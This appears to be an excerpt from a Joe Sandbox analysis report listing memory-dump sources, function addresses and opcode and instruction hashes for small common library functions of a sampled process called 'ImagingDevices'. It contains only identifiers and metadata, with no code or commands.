                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                                                                  • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                                                                                  • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                                                                  • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                                                                                  Function 0087FAD0 Relevance: .0, Instructions: 6COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                                  • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                                                                  • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                                  • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                                                                  Function 0087FA20 Relevance: .0, Instructions: 6COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                                                                                                  • Instruction ID: 9b5f4fb9875c6876c932e4128e9800c708acc4d40f0b969179b44b3e8b2884d0
                                                                                                  • Opcode Fuzzy Hash: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                                                                                                  • Instruction Fuzzy Hash: 4FB01272100580C7E30D9714D90AB4B7210FB80F00F00CD3AA00781861DB78DA2CD45A
                                                                                                  Function 0087FA50 Relevance: .0, Instructions: 6COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
                                                                                                  • Instruction ID: 2cae8b11bd858d750de1a79d340ce6dfe3ec44f87311ce0e8d0be64a47f0ebf6
                                                                                                  • Opcode Fuzzy Hash: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
                                                                                                  • Instruction Fuzzy Hash: 9BB01272100544C7E349A714DA07B8B7210FB80F00F008D3BA04782851DFB89A2CE986
                                                                                                  Function 0087FBB8 Relevance: .0, Instructions: 6COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                                  • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                                                                  • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                                  • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                                                                  Function 0087FBE8 Relevance: .0, Instructions: 6COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                                                                                                  • Instruction ID: 9452a8d0b0f104eb9e4922b1c8778681c83a3ee0f3d85b1ffb0a7dc5c1b1eaf2
                                                                                                  • Opcode Fuzzy Hash: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                                                                                                  • Instruction Fuzzy Hash: 9AB01272100640C7E349A714DA0BB5B7210FB80F00F00893BE00781852DF389A2CD986
                                                                                                  Function 0087FB50 Relevance: .0, Instructions: 6COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                                                                  • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                                                                                  • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                                                                  • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                                                                                  Function 0087FC90 Relevance: .0, Instructions: 6COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                                                                  • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                                                                                                  • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                                                                  • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                                                                                                  Function 0087FC30 Relevance: .0, Instructions: 6COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                                                                                  • Instruction ID: bea31e52b4947098166a5853b381437c0ce687cada8622438d1654f6fc3cd67c
                                                                                                  • Opcode Fuzzy Hash: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                                                                                  • Instruction Fuzzy Hash: B2B01272140540C7E3099714DA1AB5B7210FB80F00F008D3AE04781891DB7C9A2CD486
                                                                                                  Function 00880C40 Relevance: .0, Instructions: 6COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                                                                                  • Instruction ID: df3521920546c87a7cfa40f03b9d1cb3325e43f750a27356a7d3e25b902d3ed9
                                                                                                  • Opcode Fuzzy Hash: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                                                                                  • Instruction Fuzzy Hash: FAB01272201540C7F349A714D946F5BB210FB90F04F008A3AE04782850DA38992CC547
                                                                                                  Function 0087FC48 Relevance: .0, Instructions: 6COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                                                                                  • Instruction ID: ba27d4cd5f553268e31cb600e7e3d5a3e50323ff6ed211678ad30f7188510e08
                                                                                                  • Opcode Fuzzy Hash: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                                                                                  • Instruction Fuzzy Hash: 39B01272100540C7E319A714D90AB5B7250FF80F00F00893AE10781861DB38992CD456
                                                                                                  Function 0087FC60 Relevance: .0, Instructions: 6COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                                  • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                                                                  • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                                  • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                                                                  Function 00881D80 Relevance: .0, Instructions: 6COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                                                                                  • Instruction ID: c40cb18f784fb740092d7f35057b9839572fe11e4001cfe90af8ac8386c88b07
                                                                                                  • Opcode Fuzzy Hash: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                                                                                  • Instruction Fuzzy Hash: A6B09271508A40C7E204A704D985B46B221FB90B00F408938A04B865A0D72CA928C686
                                                                                                  Function 0087FD8C Relevance: .0, Instructions: 6COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                                  • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                                                                  • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                                  • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                                                                  Function 0087FD5C Relevance: .0, Instructions: 6COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                                                                                  • Instruction ID: 152fdd420af7dfcc6df86c72954370e6eab1db85fd0a81c34441345ed48de2b3
                                                                                                  • Opcode Fuzzy Hash: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                                                                                  • Instruction Fuzzy Hash: 27B01272141540C7E349A714D90AB6B7220FB80F00F00893AE00781852DB389B2CD98A
                                                                                                  Function 0087FEA0 Relevance: .0, Instructions: 6COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                                                                  • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                                                                                  • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                                                                  • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                                                                                  Function 0087FED0 Relevance: .0, Instructions: 6COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
